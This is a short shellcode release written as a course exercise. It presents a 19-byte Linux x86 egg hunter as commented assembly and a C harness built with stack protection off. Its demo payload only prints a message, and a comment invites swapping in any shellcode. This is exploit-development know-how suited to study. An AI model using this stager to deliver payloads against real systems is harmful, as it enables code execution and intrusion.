/* Title: Linux x86 Egg Hunter Shellcode (19 bytes) Date: 4 August 2015 Author: Guillaume Kaddouch Website: http://networkfilter.blogspot.com Twitter: @gkweb76 Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86 This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE). Egg signature = 0x50905090 (push eax, nop, push eax, nop) Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once. egg-hunter.asm: ---------------- global _start section .text _start: mov eax, addr ; retrieve a valid address (shorter than using JMP CALL POP) mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1 inc ebx ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature) next_addr: inc eax ; increasing memory address to look at next address cmp dword [eax], ebx ; check if our egg is at that memory address, if yes set ZF = 1 jne next_addr ; if ZF = 0 (check failed), then jump to next_addr to check next address jmp eax ; we found our egg (ZF = 1), jump at this address addr: db 0x1 */ /* myegg.c: ----------- Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg */ #include #include // Egg hunter 19 bytes (\x00 \x0a \x0d free) unsigned char egghunter[] = \ "\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75" "\xfb\xff\xe0\x01"; // Print 'Egg Found!!' on screen // You can swap it out with any shellcode you like (as long as you keep the egg mark) unsigned char shellcode[] = \ "\x90\x50\x90\x50" // egg mark "\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2" "\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45" "\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a"; main() { printf("Egg hunter shellcode Length: %d\n", strlen(egghunter)); int (*ret)() = (int(*)())egghunter; ret(); }